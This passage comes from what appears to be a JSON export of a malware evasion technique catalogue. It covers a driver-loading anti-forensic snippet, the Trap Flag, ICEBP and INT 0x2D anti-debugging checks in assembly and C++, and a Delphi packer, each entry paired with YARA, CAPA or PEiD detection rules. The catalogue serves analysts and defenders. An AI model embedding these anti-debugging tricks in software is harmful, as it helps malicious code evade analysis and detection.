entry.\r\n\t\tRtlInitUnicodeString(&usStr,wcLoadDrv);\r\n\t\tSt = NtLoadDriver(&usStr);\r\n\r\n\t\tDbgPrint(__FUNCTION__\"(): NtLoadDriver status %x\\n\",St);\r\n\t}\r\n\telse\r\n\t{\r\n\t\tDbgPrint(__FUNCTION__\"(): RegCreateKey last error %x\\n\",GetLastError());\r\n\t}\r\n}"
                }
            ],
            "detection_rules": [
                {
                    "id": 83,
                    "key": "yara_detect_eventlogtampering",
                    "type": {
                        "id": 1,
                        "name": "YARA",
                        "syntax_lang": "YARA"
                    },
                    "name": "YARA_Detect_EventLogTampering",
                    "rule": "rule Detect_EventLogTampering: AntiForensic {\r\n    meta: \r\n        description = \"Detect imports of NtLoadDriver and NdrClientCall2 as possible anti-forensic indicators\"\r\n        author = \"Unprotect\"\r\n        comment = \"Experimental rule\"\r\n    strings:\r\n        $1 = \"NtLoadDriver\" fullword ascii\r\n        $2 = \"NdrClientCall2\" fullword ascii\r\n    condition:   \r\n       uint16(0) == 0x5A4D and filesize < 1000KB and any of them \r\n}"
                }
            ]
        },
        {
            "id": 214,
            "unprotect_id": "U0131",
            "name": "Trap Flag",
            "categories": [
                {
                    "id": 3,
                    "key": "anti-debugging",
                    "label": "Anti-Debugging"
                }
            ],
            "description": "The Trap Flag (TF) is bit 8 of the EFLAGS register. When it is set, the CPU raises a single-step exception after the next instruction executes; Windows delivers it to the process as `EXCEPTION_SINGLE_STEP`. A debugger tracing the process consumes that exception itself, so if a program sets TF and its own exception handler is never reached, it can assume it is being debugged.",
            "resources": "https://www.autosectools.com/anti-debugging-with-exceptions.pdf",
            "tags": "trapflag",
            "snippets": [
                {
                    "id": 101,
                    "language": {
                        "id": 5,
                        "label": "Assembly",
                        "code_class": "x86asm"
                    },
                    "author": {
                        "id": 16,
                        "name": "External",
                        "email": null,
                        "linkedin": null,
                        "twitter": null,
                        "website": null,
                        "github": null
                    },
                    "technique": "https://unprotect.it/api/techniques/214/",
                    "description": "",
                    "plain_code": "BOOL IsDebuggerPresent_TrapFlag()\r\n{\r\n    __try\r\n    { \r\n        __asm\r\n       {\r\n           pushfd\r\n           or word ptr[esp], 0x100\r\n           popfd\r\n           nop\r\n       }\r\n    }\r\n    __except(1) \r\n    { \r\n        return FALSE; \r\n    }\r\n    return TRUE;\r\n}"
                },
                {
                    "id": 103,
                    "language": {
                        "id": 2,
                        "label": "C++",
                        "code_class": "cpp"
                    },
                    "author": {
                        "id": 16,
                        "name": "External",
                        "email": null,
                        "linkedin": null,
                        "twitter": null,
                        "website": null,
                        "github": null
                    },
                    "technique": "https://unprotect.it/api/techniques/214/",
                    "description": "Original source code available here: https://github.com/LordNoteworthy/al-khaser/blob/master/al-khaser/AntiDebug/TrapFlag.cpp",
                    "plain_code": "#include \"pch.h\"\r\n\r\n#include \"TrapFlag.h\"\r\n\r\n/*\r\n\tThis technique is similar to exceptions based debugger detections.\r\n\tYou enable the trap flag in the current process and check whether\r\n\tan exception is raised or not. If an exception is not raised, you\r\n\tcan assume that a debugger has “swallowed” the exception for us,\r\n\tand that the program is being traced. The beauty of this approach\r\n\tis that it detects every debugger, user mode or kernel mode,\r\n\tbecause they all use the trap flag for tracing a program.\r\n\tVectored Exception Handling is used here because SEH is an\r\n\tanti-debug trick in itself.\r\n*/\r\n\r\nstatic BOOL SwallowedException = TRUE;\r\n\r\nstatic LONG CALLBACK VectoredHandler(\r\n\t_In_ PEXCEPTION_POINTERS ExceptionInfo\r\n)\r\n{\r\n\tSwallowedException = FALSE;\r\n\t\r\n\tif (ExceptionInfo->ExceptionRecord->ExceptionCode == EXCEPTION_SINGLE_STEP)\r\n\t\treturn EXCEPTION_CONTINUE_EXECUTION;\r\n\t\t\r\n\treturn EXCEPTION_CONTINUE_SEARCH;\r\n}\r\n\r\n\r\n\r\nBOOL TrapFlag()\r\n{\r\n\tPVOID Handle = AddVectoredExceptionHandler(1, VectoredHandler);\r\n\tSwallowedException = TRUE;\r\n\r\n#ifdef _WIN64\r\n\tUINT64 eflags = __readeflags();\r\n#else\r\n\tUINT eflags = __readeflags();\r\n#endif\r\n\r\n\t//  Set the trap flag\r\n\teflags |= 0x100;\r\n\t__writeeflags(eflags);\r\n\r\n\tRemoveVectoredExceptionHandler(Handle);\r\n\treturn SwallowedException;\r\n}"
                }
            ],
            "detection_rules": [
                {
                    "id": 85,
                    "key": "capa_trap_flag",
                    "type": {
                        "id": 2,
                        "name": "CAPA",
                        "syntax_lang": "yaml"
                    },
                    "name": "CAPA_Trap_Flag",
                    "rule": "rule:\r\n  meta:\r\n    name: check for trap flag exception\r\n    namespace: anti-analysis/anti-debugging/debugger-detection\r\n    authors:\r\n      - michael.hunhoff@mandiant.com\r\n    scope: basic block\r\n    mbc:\r\n      - Anti-Behavioral Analysis::Debugger Detection [B0001]\r\n    references:\r\n      - https://github.com/LordNoteworthy/al-khaser/blob/master/al-khaser/AntiDebug/TrapFlag.cpp\r\n    examples:\r\n      - al-khaser_x86.exe_:0x431680\r\n      - al-khaser_x64.exe_:0x140030CB0\r\n  features:\r\n    - and:\r\n      - or:\r\n        - description: read/write EFLAGS register\r\n        - and:\r\n          - mnemonic: pushf\r\n          - mnemonic: popf\r\n        - and:\r\n          - mnemonic: pushfd\r\n          - mnemonic: popfd\r\n        - and:\r\n          - mnemonic: pushfq\r\n          - mnemonic: popfq\r\n      - or:\r\n        - description: set trap flag\r\n        - and:\r\n          - mnemonic: or\r\n          - number: 0x100\r\n        - and:\r\n          - mnemonic: bts\r\n          - number: 0x8"
                }
            ]
        },
        {
            "id": 213,
            "unprotect_id": "U0130",
            "name": "ICE 0xF1",
            "categories": [
                {
                    "id": 3,
                    "key": "anti-debugging",
                    "label": "Anti-Debugging"
                }
            ],
            "description": "ICEBP (opcode `0xF1`) is an undocumented single-byte instruction that behaves like `INT 1`: it raises a single-step exception. A debugger attached to the process normally consumes this exception, so a program can detect that it is being traced by checking whether its own exception handler ever runs.",
            "resources": "https://www.autosectools.com/anti-debugging-with-exceptions.pdf",
            "tags": "0xf1,icebp",
            "snippets": [
                {
                    "id": 100,
                    "language": {
                        "id": 5,
                        "label": "Assembly",
                        "code_class": "x86asm"
                    },
                    "author": {
                        "id": 16,
                        "name": "External",
                        "email": null,
                        "linkedin": null,
                        "twitter": null,
                        "website": null,
                        "github": null
                    },
                    "technique": "https://unprotect.it/api/techniques/213/",
                    "description": "",
                    "plain_code": "BOOL IsDebuggerPresent_IceBp()\r\n{\r\n    __try\r\n    { \r\n        __asm __emit 0xF1 \r\n    }\r\n    __except(1) \r\n    { \r\n        return FALSE; \r\n    }\r\n    return TRUE;\r\n}"
                }
            ],
            "detection_rules": [
                {
                    "id": 70,
                    "key": "detect_interrupts",
                    "type": {
                        "id": 1,
                        "name": "YARA",
                        "syntax_lang": "YARA"
                    },
                    "name": "Detect_Interrupts",
                    "rule": "rule Detect_Interrupt: AntiDebug {\r\n    meta: \r\n        description = \"Detect Interrupt instruction\"\r\n        author = \"Unprotect\"\r\n        comment = \"Experimental rule / the rule can be slow to use\"\r\n    strings:\r\n        $int3 = { CC }\r\n        $intCD = { CD }\r\n        $int03 = { 03 }\r\n        $int2D = { 2D }\r\n        $ICE = { F1 }\r\n    condition:   \r\n       uint16(0) == 0x5A4D and filesize < 1000KB and any of them\r\n}"
                },
                {
                    "id": 87,
                    "key": "capa_check_icebp",
                    "type": {
                        "id": 2,
                        "name": "CAPA",
                        "syntax_lang": "yaml"
                    },
                    "name": "CAPA_Check_ICEBP",
                    "rule": "rule:\r\n  meta:\r\n    name: execute anti-debugging instructions\r\n    namespace: anti-analysis/anti-debugging/debugger-detection\r\n    authors:\r\n      - moritz.raabe@mandiant.com\r\n    scope: function\r\n    mbc:\r\n      - Anti-Behavioral Analysis::Debugger Detection::Anti-debugging Instructions [B0001.034]\r\n    examples:\r\n      - Practical Malware Analysis Lab 16-03.exe_:0x401300\r\n  features:\r\n    - or:\r\n      - count(mnemonic(rdtsc)): 2 or more\r\n      - mnemonic: icebp"
                }
            ]
        },
        {
            "id": 212,
            "unprotect_id": "U0129",
            "name": "INT 0x2D",
            "categories": [
                {
                    "id": 3,
                    "key": "anti-debugging",
                    "label": "Anti-Debugging"
                }
            ],
            "description": "When the instruction `INT 2D` is executed, the exception `EXCEPTION_BREAKPOINT` is raised. Windows uses the EIP register as the exception address and then increments EIP, so the byte following the instruction is skipped; debuggers that do not account for this mis-disassemble or mis-step at that point. Windows also examines the value of the EAX register while `INT 2D` is executed. As with the other exception-based checks, an attached debugger usually consumes the exception, so if the program's own handler is never reached it can assume it is being debugged.",
            "resources": "https://www.autosectools.com/anti-debugging-with-exceptions.pdf\r\nhttps://anti-debug.checkpoint.com/techniques/assembly.html#int2d",
            "tags": "int2d",
            "snippets": [
                {
                    "id": 99,
                    "language": {
                        "id": 5,
                        "label": "Assembly",
                        "code_class": "x86asm"
                    },
                    "author": {
                        "id": 16,
                        "name": "External",
                        "email": null,
                        "linkedin": null,
                        "twitter": null,
                        "website": null,
                        "github": null
                    },
                    "technique": "https://unprotect.it/api/techniques/212/",
                    "description": "",
                    "plain_code": "BOOL IsDebuggerPresent_Int2d()\r\n{\r\n    __try\r\n    { \r\n        __asm int 0x2d \r\n    }\r\n    __except(1)\r\n    {\r\n        return FALSE;\r\n    }\r\n    return TRUE;\r\n}"
                },
                {
                    "id": 102,
                    "language": {
                        "id": 2,
                        "label": "C++",
                        "code_class": "cpp"
                    },
                    "author": {
                        "id": 16,
                        "name": "External",
                        "email": null,
                        "linkedin": null,
                        "twitter": null,
                        "website": null,
                        "github": null
                    },
                    "technique": "https://unprotect.it/api/techniques/212/",
                    "description": "Original source code available here: https://github.com/LordNoteworthy/al-khaser/blob/master/al-khaser/AntiDebug/Interrupt_0x2d.cpp",
                    "plain_code": "#include \"pch.h\"\r\n\r\n#include \"Interrupt_0x2d.h\"\r\n\r\n/*\r\nThe Interrupt_0x2d function will check to see if a debugger is attached to the current process. It does this by setting up\r\nSEH and using the Int 2D instruction which will only cause an exception if there is no debugger. Also when used in OllyDBG\r\nit will skip a byte in the disassembly which could be used to detect the debugger.\r\nVectored Exception Handling is used here because SEH is an anti-debug trick in itself.\r\n*/\r\n\r\nextern \"C\" void __int2d();\r\n\r\nstatic BOOL SwallowedException = TRUE;\r\n\r\nstatic LONG CALLBACK VectoredHandler(\r\n\t_In_ PEXCEPTION_POINTERS ExceptionInfo\r\n)\r\n{\r\n\tSwallowedException = FALSE;\r\n\tif (ExceptionInfo->ExceptionRecord->ExceptionCode == EXCEPTION_BREAKPOINT)\r\n\t{\r\n\t\t//The Int 2D instruction already increased EIP/RIP so we don't do that (although it wouldnt hurt).\r\n\t\treturn EXCEPTION_CONTINUE_EXECUTION;\r\n\t}\r\n\treturn EXCEPTION_CONTINUE_SEARCH;\r\n}\r\n\r\nBOOL Interrupt_0x2d()\r\n{\r\n\tPVOID Handle = AddVectoredExceptionHandler(1, VectoredHandler);\r\n\tSwallowedException = TRUE;\r\n\t__int2d();\r\n\tRemoveVectoredExceptionHandler(Handle);\r\n\treturn SwallowedException;\r\n}"
                }
            ],
            "detection_rules": [
                {
                    "id": 70,
                    "key": "detect_interrupts",
                    "type": {
                        "id": 1,
                        "name": "YARA",
                        "syntax_lang": "YARA"
                    },
                    "name": "Detect_Interrupts",
                    "rule": "rule Detect_Interrupt: AntiDebug {\r\n    meta: \r\n        description = \"Detect Interrupt instruction\"\r\n        author = \"Unprotect\"\r\n        comment = \"Experimental rule / the rule can be slow to use\"\r\n    strings:\r\n        $int3 = { CC }\r\n        $intCD = { CD }\r\n        $int03 = { 03 }\r\n        $int2D = { 2D }\r\n        $ICE = { F1 }\r\n    condition:   \r\n       uint16(0) == 0x5A4D and filesize < 1000KB and any of them\r\n}"
                }
            ]
        },
        {
            "id": 211,
            "unprotect_id": "U1428",
            "name": "BobSoft Mini Delphi Packer",
            "categories": [
                {
                    "id": 12,
                    "key": "packers",
                    "label": "Packers"
                }
            ],
            "description": "The Delphi programming language can be an easy way to write applications and programs that leverage Windows API functions. In fact, some actors deliberately include the default libraries as a diversion to hamper static analysis and make the application \"look legit\" during dynamic analysis. \r\n\r\nThe packer goes to great lengths to ensure that it is not running in an analysis environment. Normal user activity involves many application windows being rotated or changed over a period of time. The first variant of the packer uses `GetForegroundWindow` API to check for the user activity of changing windows at least three times before it executes further. If it does not see the change of windows, it puts itself into an infinite sleep.",
            "resources": "https://www.mandiant.com/resources/increased-use-of-delphi-packer-to-evade-malware-classification",
            "tags": "delphi,packer",
            "snippets": [],
            "detection_rules": [
                {
                    "id": 117,
                    "key": "yara_detect_bobsoft",
                    "type": {
                        "id": 1,
                        "name": "YARA",
                        "syntax_lang": "YARA"
                    },
                    "name": "YARA_Detect_Bobsoft",
                    "rule": "rule PEiD_Bundle_v100_BoB_BobSoft: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 21 02 00 00 8B 44 24 04 52 48 66 31 C0 66 81 38 4D 5A 75 F5 8B 50 3C 81 3C 02 50 45 00 00 75 E9 5A C2 04 00 60 89 DD 89 C3 8B 45 3C 8B 54 28 78 01 EA 52 8B 52 20 01 EA 31 C9 41 8B 34 8A }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PluginToExe_v101_BoB_BobSoft_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { E8 00 00 00 00 29 C0 5D 81 ED C6 41 40 00 50 8F 85 71 40 40 00 50 FF 95 A5 41 40 00 89 85 6D 40 40 00 FF 95 A1 41 40 00 50 FF 95 B5 41 40 00 80 38 00 74 16 8A 08 80 F9 22 75 07 50 FF 95 B9 41 40 00 89 85 75 40 40 00 EB 6C 6A 01 8F 85 71 40 40 00 6A 58 6A }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Upx_Lock_10_12_CyberDoom_Team_X_BoB_BobSoft: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 5D 81 ED 48 12 40 00 60 E8 2B 03 00 00 61 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PEiD_Bundle_v102_v104_BoB_BobSoft: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 ?? ?? ?? 2E ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 80 00 00 00 00 4B 65 72 6E 65 6C 33 32 2E 44 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PEiD_Bundle_v100_BoB_BobSoft_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 21 02 00 00 8B 44 24 04 52 48 66 31 C0 66 81 38 4D 5A 75 F5 8B 50 3C 81 3C 02 50 45 00 00 75 E9 5A C2 04 00 60 89 DD 89 C3 8B 45 3C 8B 54 28 78 01 EA 52 8B 52 20 01 EA 31 C9 41 8B 34 8A }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Splash_Bitmap_v100_With_Unpack_Code_BoB_Bobsoft: PEiD\r\n{\r\n    strings:\r\n        $a = { E8 00 00 00 00 60 8B 6C 24 20 55 81 ED ?? ?? ?? ?? 8D BD ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 29 F9 31 C0 FC F3 AA 8B 04 24 48 66 25 00 F0 66 81 38 4D 5A 75 F4 8B 48 3C 81 3C 01 50 45 00 00 75 E8 89 85 ?? ?? ?? ?? 6A 40 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PEiD_Bundle_v100_v101_BoB_BobSoft_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 ?? 02 00 00 8B 44 24 04 52 48 66 31 C0 66 81 38 4D 5A 75 F5 8B 50 3C 81 3C 02 50 45 00 00 75 E9 5A C2 04 00 60 89 DD 89 C3 8B 45 3C 8B 54 28 78 01 EA 52 8B 52 20 01 EA 31 C9 41 8B 34 8A }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PEiD_Bundle_V102_DLL_BoB_BobSoft: PEiD\r\n{\r\n    strings:\r\n        $a = { 83 7C 24 08 01 0F 85 ?? ?? ?? ?? 60 E8 9C 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 41 00 08 00 39 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 80 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PluginToExe_v102_BoB_BobSoft: PEiD\r\n{\r\n    strings:\r\n        $a = { E8 00 00 00 00 29 C0 5D 81 ED 32 42 40 00 50 8F 85 DD 40 40 00 50 FF 95 11 42 40 00 89 85 D9 40 40 00 FF 95 0D 42 40 00 50 FF 95 21 42 40 00 80 38 00 74 16 8A 08 80 F9 22 75 07 50 FF 95 25 42 40 00 89 85 E1 40 40 00 EB 6C 6A 01 8F 85 DD 40 40 00 6A 58 6A 40 FF 95 15 42 40 00 89 85 D5 40 40 00 89 C7 68 00 08 00 00 6A 40 FF 95 15 42 40 00 89 47 1C C7 07 58 00 }\r\n        $b = { E8 00 00 00 00 29 C0 5D 81 ED 32 42 40 00 50 8F 85 DD 40 40 00 50 FF 95 11 42 40 00 89 85 D9 40 40 00 FF 95 0D 42 40 00 50 FF 95 21 42 40 00 80 38 00 74 16 8A 08 80 F9 22 75 07 50 FF 95 25 42 40 00 89 85 E1 40 40 00 EB 6C 6A 01 8F 85 DD 40 40 00 6A 58 6A }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule PEiD_Bundle_v102_BoB_BobSoft: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 9C 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 ?? ?? ?? 2E ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 80 00 00 00 00 4B 65 72 6E 65 6C 33 32 2E 44 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PEiD_Bundle_v104_BoB_BobSoft: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 ?? ?? ?? 2E ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 80 00 00 00 00 4B 65 72 6E 65 6C 33 32 2E 44 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PEiD_Bundle_V101_BoB_BobSoft: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 23 02 00 00 8B 44 24 04 52 48 66 31 C0 66 81 38 4D 5A 75 F5 8B 50 3C 81 3C 02 50 45 00 00 75 E9 5A C2 04 00 60 89 DD 89 C3 8B 45 3C 8B 54 28 78 01 EA 52 8B 52 20 01 EA 31 C9 41 8B 34 8A }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PEiD_Bundle_102_DLL_BoB_BobSoft: PEiD\r\n{\r\n    strings:\r\n        $a = { 83 7C 24 08 01 0F 85 ?? ?? ?? ?? 60 E8 9C 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 41 00 08 00 39 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 80 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Imploder_v104_BoB_BobSoft: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 ?? ?? ?? 2E ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 80 00 00 00 00 4B 65 72 6E 65 6C 33 32 2E 44 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PEiD_Bundle_v101_BoB_BobSoft_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 23 02 00 00 8B 44 24 04 52 48 66 31 C0 66 81 38 4D 5A 75 F5 8B 50 3C 81 3C 02 50 45 00 00 75 E9 5A C2 04 00 60 89 DD 89 C3 8B 45 3C 8B 54 28 78 01 EA 52 8B 52 20 01 EA 31 C9 41 8B 34 8A }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PEiD_Bundle_V100_BoB_BobSoft: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 21 02 00 00 8B 44 24 04 52 48 66 31 C0 66 81 38 4D 5A 75 F5 8B 50 3C 81 3C 02 50 45 00 00 75 E9 5A C2 04 00 60 89 DD 89 C3 8B 45 3C 8B 54 28 78 01 EA 52 8B 52 20 01 EA 31 C9 41 8B 34 8A }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PEiD_Bundle_V102_BoB_BobSoft: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 9C 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 ?? ?? ?? 2E ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 80 00 00 00 00 4B 65 72 6E 65 6C 33 32 2E 44 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PluginToExe_v101_BoB_BobSoft: PEiD\r\n{\r\n    strings:\r\n        $a = { E8 00 00 00 00 29 C0 5D 81 ED C6 41 40 00 50 8F 85 71 40 40 00 50 FF 95 A5 41 40 00 89 85 6D 40 40 00 FF 95 A1 41 40 00 50 FF 95 B5 41 40 00 80 38 00 74 16 8A 08 80 F9 22 75 07 50 FF 95 B9 41 40 00 89 85 75 40 40 00 EB 6C 6A 01 8F 85 71 40 40 00 6A 58 6A 40 FF 95 A9 41 40 00 89 85 69 40 40 00 89 C7 68 00 08 00 00 6A 40 FF 95 A9 41 40 00 89 47 1C C7 07 58 00 00 00 C7 47 20 00 08 00 00 C7 47 18 01 00 00 00 C7 47 34 04 10 88 00 8D 8D B9 40 40 00 89 4F 0C 8D 8D DB 40 40 00 89 4F 30 FF B5 69 40 40 00 FF 95 95 41 40 00 FF 77 1C 8F 85 75 40 40 00 8B 9D 6D 40 40 00 60 6A 00 6A 01 53 81 C3 ?? ?? ?? 00 FF D3 61 6A 00 68 44 69 45 50 FF B5 75 40 40 00 6A 00 81 C3 ?? ?? 00 00 FF D3 83 C4 10 83 BD 71 40 40 00 00 74 10 FF 77 1C FF 95 AD 41 40 00 57 FF 95 AD 41 40 00 6A 00 FF 95 9D 41 40 00 }\r\n        $b = { E8 00 00 00 00 29 C0 5D 81 ED C6 41 40 00 50 8F 85 71 40 40 00 50 FF 95 A5 41 40 00 89 85 6D 40 40 00 FF 95 A1 41 40 00 50 FF 95 B5 41 40 00 80 38 00 74 16 8A 08 80 F9 22 75 07 50 FF 95 B9 41 40 00 89 85 75 40 40 00 EB 6C 6A 01 8F 85 71 40 40 00 6A 58 6A }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule BobPack_v100_BoB_BobSoft: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 8B 0C 24 89 CD 83 E9 06 81 ED ?? ?? ?? ?? E8 3D 00 00 00 89 85 ?? ?? ?? ?? 89 C2 B8 5D 0A 00 00 8D 04 08 E8 E4 00 00 00 8B 70 04 01 D6 E8 76 00 00 00 E8 51 01 00 00 E8 01 01 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule BobSoft_Mini_Delphi_BoB_BobSoft_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 55 8B EC 83 C4 F0 B8 ?? ?? ?? ?? E8 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule BobSoft_Mini_Delphi_BoB_BobSoft: PEiD\r\n{\r\n    strings:\r\n        $a = { 55 8B EC 83 C4 F0 53 56 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 B8 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PEiD_Bundle_v100_v101_BoB_BobSoft: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 ?? 02 00 00 8B 44 24 04 52 48 66 31 C0 66 81 38 4D 5A 75 F5 8B 50 3C 81 3C 02 50 45 00 00 75 E9 5A C2 04 00 60 89 DD 89 C3 8B 45 3C 8B 54 28 78 01 EA 52 8B 52 20 01 EA 31 C9 41 8B 34 8A }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule BobPack_v100_BoB_BobSoft_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 8B 0C 24 89 CD 83 E9 06 81 ED ?? ?? ?? ?? E8 3D 00 00 00 89 85 ?? ?? ?? ?? 89 C2 B8 5D 0A 00 00 8D 04 08 E8 E4 00 00 00 8B 70 04 01 D6 E8 76 00 00 00 E8 51 01 00 00 E8 01 01 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PluginToExe_v102_BoB_BobSoft_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { E8 00 00 00 00 29 C0 5D 81 ED 32 42 40 00 50 8F 85 DD 40 40 00 50 FF 95 11 42 40 00 89 85 D9 40 40 00 FF 95 0D 42 40 00 50 FF 95 21 42 40 00 80 38 00 74 16 8A 08 80 F9 22 75 07 50 FF 95 25 42 40 00 89 85 E1 40 40 00 EB 6C 6A 01 8F 85 DD 40 40 00 6A 58 6A }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PEiD_Bundle_v101_BoB_BobSoft: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 23 02 00 00 8B 44 24 04 52 48 66 31 C0 66 81 38 4D 5A 75 F5 8B 50 3C 81 3C 02 50 45 00 00 75 E9 5A C2 04 00 60 89 DD 89 C3 8B 45 3C 8B 54 28 78 01 EA 52 8B 52 20 01 EA 31 C9 41 8B 34 8A }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Splash_Bitmap_v100_BoB_Bobsoft: PEiD\r\n{\r\n    strings:\r\n        $a = { E8 00 00 00 00 60 8B 6C 24 20 55 81 ED ?? ?? ?? ?? 8D BD ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 29 F9 31 C0 FC F3 AA 8B 04 24 48 66 25 00 F0 66 81 38 4D 5A 75 F4 8B 48 3C 81 3C 01 50 45 00 00 75 E8 89 85 ?? ?? ?? ?? 8D BD ?? ?? ?? ?? 6A 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Upx_Lock_10_12_CyberDoom_Team_X_BoB_BobSoft_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 5D 81 ED 48 12 40 00 60 E8 2B 03 00 00 61 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PluginToExe_v100_BoB_BobSoft_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { E8 00 00 00 00 29 C0 5D 81 ED D1 40 40 00 50 FF 95 B8 40 40 00 89 85 09 40 40 00 FF 95 B4 40 40 00 89 85 11 40 40 00 50 FF 95 C0 40 40 00 8A 08 80 F9 22 75 07 50 FF 95 C4 40 40 00 89 85 0D 40 40 00 8B 9D 09 40 40 00 60 6A 00 6A 01 53 81 C3 ?? ?? ?? 00 FF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PEiD_Bundle_v102_v103_DLL_BoB_BobSoft: PEiD\r\n{\r\n    strings:\r\n        $a = { 83 7C 24 08 01 0F 85 ?? ?? ?? ?? 60 E8 9C 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 41 00 08 00 39 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 80 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PluginToExe_v100_BoB_BobSoft: PEiD\r\n{\r\n    strings:\r\n        $a = { E8 00 00 00 00 29 C0 5D 81 ED D1 40 40 00 50 FF 95 B8 40 40 00 89 85 09 40 40 00 FF 95 B4 40 40 00 89 85 11 40 40 00 50 FF 95 C0 40 40 00 8A 08 80 F9 22 75 07 50 FF 95 C4 40 40 00 89 85 0D 40 40 00 8B 9D 09 40 40 00 60 6A 00 6A 01 53 81 C3 ?? ?? ?? 00 FF D3 61 6A 00 68 44 69 45 50 FF B5 0D 40 40 00 6A 00 81 C3 ?? ?? ?? 00 FF D3 83 C4 10 FF 95 B0 40 40 00 }\r\n        $b = { E8 00 00 00 00 29 C0 5D 81 ED D1 40 40 00 50 FF 95 B8 40 40 00 89 85 09 40 40 00 FF 95 B4 40 40 00 89 85 11 40 40 00 50 FF 95 C0 40 40 00 8A 08 80 F9 22 75 07 50 FF 95 C4 40 40 00 89 85 0D 40 40 00 8B 9D 09 40 40 00 60 6A 00 6A 01 53 81 C3 ?? ?? ?? 00 FF }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule PEiD_Bundle_v102_v103_BoB_BobSoft: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 9C 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 ?? ?? ?? 2E ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 80 00 00 00 00 4B 65 72 6E 65 6C 33 32 2E 44 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}"
                }
            ]
        },
        {
            "id": 210,
